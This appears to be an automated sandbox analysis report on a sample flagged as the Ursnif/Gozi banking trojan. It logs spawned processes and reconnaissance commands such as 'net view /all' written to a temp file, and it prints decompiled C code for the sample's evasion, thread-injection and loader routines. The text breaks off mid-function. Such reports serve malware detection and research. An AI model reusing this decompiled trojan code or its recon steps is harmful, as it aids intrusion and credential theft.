Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2800, Parent PID: 3528

General

Target ID:	90
Start time:	15:05:20
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2500, Parent PID: 2800

General

Target ID:	91
Start time:	15:05:20
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4108, Parent PID: 3528

General

Target ID:	92
Start time:	15:05:21
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Lx6.exePID: 1172, Parent PID: 3528COMMON

Executed Functions

Function 00401673 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00401673() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				void* __edi;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E004019F9();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E004012CE(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E00401E0B(_t71);
						}
					} while (_v8 != 0);
					_t30 = E0040141E(_t71, _t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 9);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401C70(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E0040186D, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8); // executed
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x404178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E004012CE(_t75 + _t22);
					 *0x404178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E00401E0B(_t66);
					goto L20;
				}
			}

0x00401679
0x0040167e
0x00401683
0x0040182a
0x0040182a
0x0040168c
0x0040168c
0x00401690
0x00401693
0x00401694
0x0040169a
0x0040169e
0x004016d5
0x004016a0
0x004016a8
0x004016ae
0x004016b0
0x004016b5
0x004016bb
0x004016bd
0x004016bd
0x004016c4
0x004016ca
0x004016ca
0x004016ce
0x004016ce
0x004016dc
0x004016e3
0x004016ec
0x004016ef
0x004016f5
0x004016f8
0x00401701
0x00401826
0x00000000
0x00401828
0x00401714
0x00401717
0x0040171f
0x00401721
0x0040172c
0x00401734
0x00401734
0x00401742
0x00401818
0x00401818
0x0040181e
0x00401820
0x00401820
0x00000000
0x00401748
0x00401753
0x00401791
0x00401797
0x004017a9
0x004017af
0x004017b3
0x0040180f
0x00401815
0x00000000
0x00401815
0x004017bf
0x004017cd
0x004017d5
0x004017d9
0x004017e0
0x004017e3
0x004017e5
0x004017e5
0x004017ed
0x00000000
0x004017ef
0x004017f2
0x004017f8
0x004017fd
0x00401804
0x00401804
0x0040180b
0x00000000
0x0040180b
0x004017ed
0x00401755
0x0040175a
0x00401761
0x00401763
0x00401767
0x00401789
0x00401789
0x00000000
0x00401789
0x00401769
0x0040176e
0x00401773
0x0040177a
0x00000000
0x00000000
0x0040177f
0x00401782
0x00000000
0x00401782

APIs

Part of subcall function 004019F9: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040167E), ref: 00401A08
Part of subcall function 004019F9: GetVersion.KERNEL32 ref: 00401A17
Part of subcall function 004019F9: GetCurrentProcessId.KERNEL32 ref: 00401A33
Part of subcall function 004019F9: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401A4C

Part of subcall function 004012CE: HeapAlloc.KERNEL32(00000000,?,0040169A,00000030,?,00000000), ref: 004012DA

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004016A8
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 004016EF
GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401717
GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401721
VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401734
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401761
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0040177F
CreateThread.KERNEL32 ref: 004017A9
QueueUserAPC.KERNEL32(0040186D,00000000,?,?,00000000), ref: 004017BF
GetLastError.KERNEL32(?,00000000), ref: 004017CF
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004017D9
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004017E0
SetLastError.KERNEL32(00000000,?,00000000), ref: 004017E5
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004017F2
GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401804
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040180B
GetLastError.KERNEL32(?,00000000), ref: 0040180F
GetLastError.KERNEL32(?,00000000), ref: 00401820

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
String ID:
API String ID: 520738550-0
Opcode ID: 1449a072e7e51362290b3e8bc3c57428a1db1ad19b4198ea77362345be60a686
Instruction ID: a7164e555c90f504e1d3b6c16095ab51734ebf934e0dd3094f6272113b0a0e1d
Opcode Fuzzy Hash: 1449a072e7e51362290b3e8bc3c57428a1db1ad19b4198ea77362345be60a686
Instruction Fuzzy Hash: 5751C276901214ABD721AFA59D48EAF7FBCEB45715F104136FA01F32A4D7388B40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0075D977 Relevance: 10.6, APIs: 7, Instructions: 113
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.SHLWAPI(03F0B5B0,00000000,0000005C,?,?,?), ref: 0075D9B3
_strupr.NTDLL ref: 0075D9C9
lstrlen.KERNEL32(03F0B5B0,?,?), ref: 0075D9D1
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 0075DA51
RtlAddVectoredExceptionHandler.NTDLL(00000000,007680A1), ref: 0075DA78
GetLastError.KERNEL32(?,?), ref: 0075DA92
RtlRemoveVectoredExceptionHandler.NTDLL(00498540), ref: 0075DAA8

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: 68e28365d32627478cf92f9b20a597673568229825027a121b9b3e09e80f0957
Instruction ID: 569408f773087ff9e33d36bfa463c5d0ec5fc5995a413c91a804d13c8c783e7e
Opcode Fuzzy Hash: 68e28365d32627478cf92f9b20a597673568229825027a121b9b3e09e80f0957
Instruction Fuzzy Hash: E4313772904118AFDB70AF74DC8C8AFB7A9A704392B44C139ED05D3150DABC8CC98B56

Uniqueness

Uniqueness Score: -1.00%

Function 00401927 Relevance: 10.6, APIs: 7, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401927(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L0040202C();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402026();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401927
0x00401930
0x00401934
0x0040193a
0x0040193f
0x00401944
0x00401947
0x0040194a
0x0040194f
0x00401950
0x00401953
0x0040195e
0x00401965
0x00401969
0x0040196b
0x0040196c
0x0040196f
0x00401974
0x0040197e
0x00401980
0x00401980
0x00401994
0x0040199a
0x0040199e
0x004019ee
0x004019a0
0x004019a9
0x004019bf
0x004019c7
0x004019d9
0x004019dd
0x00000000
0x00000000
0x004019c9
0x004019cc
0x004019d1
0x004019d3
0x004019d3
0x004019b4
0x004019b6
0x004019df
0x004019e0
0x004019e0
0x004019a9
0x004019f6

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,004018E6,0000000A,?,?), ref: 00401934
CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 00401994
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004018E6,0000000A,?), ref: 004019AB
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 004019BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004018E6,0000000A,?), ref: 004019D7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004018E6,0000000A), ref: 004019E0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004018E6,0000000A,?), ref: 004019E8

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
String ID:
API String ID: 3812556954-0
Opcode ID: e3aee5ce64783fd471e5b06753e01037093f080721d97c0d4bad635501ef85ac
Instruction ID: 1a8bcb9e42aeebbf6767b3bd41eff8971fc1549e31288d3551cc7f0e082297e8
Opcode Fuzzy Hash: e3aee5ce64783fd471e5b06753e01037093f080721d97c0d4bad635501ef85ac
Instruction Fuzzy Hash: D121C1F2500108BFD710AFA4CC88EAE7BADEB48355F14413AFA05F72A0D6748945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0075AA0B Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0075AA52
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0075AA65
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0075AA81

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0075AA9E
memcpy.NTDLL(?,00000000,0000001C), ref: 0075AAAB
NtClose.NTDLL(?), ref: 0075AABD
NtClose.NTDLL(?), ref: 0075AAC7

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: dcba6ca91962383947abe420b9c111c8bbf909cc851f229c724cb8b424d36d25
Instruction ID: 0c9aa349778bb55d0822a3f284f34dbbed57828b9d7a5a2cca62248c89176655
Opcode Fuzzy Hash: dcba6ca91962383947abe420b9c111c8bbf909cc851f229c724cb8b424d36d25
Instruction Fuzzy Hash: 0621E7B2900218FBDB019F95DD459DEBFBDFB08780F108126F905E6161D7B99B44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076D196 Relevance: 9.1, APIs: 6, Instructions: 94
threadmemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0076D1C1
HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0076D1CE
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0076D25A
GetModuleHandleA.KERNEL32(00000000), ref: 0076D265
RtlImageNtHeader.NTDLL(00000000), ref: 0076D26E
RtlExitUserThread.NTDLL(00000000), ref: 0076D283

Part of subcall function 00770E50: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0076D1FC,?), ref: 00770E58
Part of subcall function 00770E50: GetVersion.KERNEL32 ref: 00770E67
Part of subcall function 00770E50: GetCurrentProcessId.KERNEL32 ref: 00770E83
Part of subcall function 00770E50: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00770EA0

Part of subcall function 0075D39E: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0075D3FD

Part of subcall function 0076D0F7: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0075EB10), ref: 0076D11D

Part of subcall function 0076BB46: GetModuleHandleA.KERNEL32(?,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BB67
Part of subcall function 0076BB46: GetProcAddress.KERNEL32(00000000,?), ref: 0076BB80
Part of subcall function 0076BB46: OpenProcess.KERNEL32(00000400,00000000,0076DA64,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BB9D
Part of subcall function 0076BB46: IsWow64Process.KERNEL32(00000000,00000000,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BBAE
Part of subcall function 0076BB46: FindCloseChangeNotification.KERNEL32(00000000,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BBC1

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 2581485877-0
Opcode ID: e77b6e2186c11bd128633f532a06ed2e5dab8c1acecf333da98e0672fde6c5ec
Instruction ID: f186db9baad100bb94694e4186d30f7be0a67052a9f8fadf50bbfaaebdfe94e8
Opcode Fuzzy Hash: e77b6e2186c11bd128633f532a06ed2e5dab8c1acecf333da98e0672fde6c5ec
Instruction Fuzzy Hash: 1F319171E00118EFCB31AFA4DC88EADB775FB85790B118129E816E7250D678DD84C791

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004015CB(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E0040182B(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x004015d4
0x004015db
0x004015dc
0x004015dd
0x004015de
0x004015df
0x004015f0
0x004015f4
0x00401608
0x0040160b
0x0040160e
0x00401615
0x00401618
0x0040161f
0x00401622
0x00401625
0x00401628
0x0040162d
0x00401668
0x0040162f
0x00401632
0x00401638
0x0040163d
0x00401641
0x0040165f
0x00401643
0x0040164a
0x00401658
0x00401658
0x00401641
0x00401670

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401628

Part of subcall function 0040182B: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040163D,00000002,00000000,?,?,00000000,?,?,0040163D,00000002), ref: 00401858

memset.NTDLL ref: 0040164A

Strings

@, xrefs: 00401618

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 1d0e6dcf4b9d291767dda84388d35dab7a9e82adbd54550734e46afbddde5e10
Instruction ID: 6261325f015a40bdbc7ba716177b8f3cbeeaad6003a88c0e11ec80311fc13a73
Opcode Fuzzy Hash: 1d0e6dcf4b9d291767dda84388d35dab7a9e82adbd54550734e46afbddde5e10
Instruction Fuzzy Hash: A5210EB5D00209AFCB11DFA9C8849DEFBB9FB48354F10443AE606F7250D7359A458B64

Uniqueness

Uniqueness Score: -1.00%

Function 007541C8 Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000318), ref: 007541ED
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00754209

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

Part of subcall function 00751402: GetProcAddress.KERNEL32(?), ref: 0075142B
Part of subcall function 00751402: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 0075144D

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 00754373

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: 836212b96fc8a2ed0094c84bac505c21a93d9e4bbc03100a496a544e853ef59b
Instruction ID: 83c7f9bde5f0aef002789d865194de1ff5632f2cd31166a518a888ed120f9b2d
Opcode Fuzzy Hash: 836212b96fc8a2ed0094c84bac505c21a93d9e4bbc03100a496a544e853ef59b
Instruction Fuzzy Hash: DB613F71A0021AEBDF15DF95C880BEEBBB5FF08305F004169ED54AB251D778E995CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0075B433 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0075B447
GetProcAddress.KERNEL32(?), ref: 0075B46F
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 0075B48D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: e105bc669aea1a74ea11b477097d467bd71c17a166a1336aef6ce6728e1e7c30
Instruction ID: fb6352f2fbe4cef7f1e70d1b9fe7f8a62134e16bbef6771b1cf23dc7a4297ad1
Opcode Fuzzy Hash: e105bc669aea1a74ea11b477097d467bd71c17a166a1336aef6ce6728e1e7c30
Instruction Fuzzy Hash: 4C117371600259EFDB10DB94DC49FA977B8EB45741F048024ED08EB391D778ED0ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 00768E68 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,00755124,00000018,00000000,00778420), ref: 00768E7F

Strings

Uqt, xrefs: 00768E68

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID: Uqt
API String ID: 1778838933-2320327147
Opcode ID: 43e0822747da688d4fd2a0f26ecd99fc295a9b5820252426bfc98275c6e999c3
Instruction ID: fa0ba4c4b356158d58a4eaa45e09cfa2018f6779949fe80196b4b9acadae8a9f
Opcode Fuzzy Hash: 43e0822747da688d4fd2a0f26ecd99fc295a9b5820252426bfc98275c6e999c3
Instruction Fuzzy Hash: A4F0BE313000149BCB60CF14CC84D9BBBB8EB01B407108614ED06DB220DB35ED46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
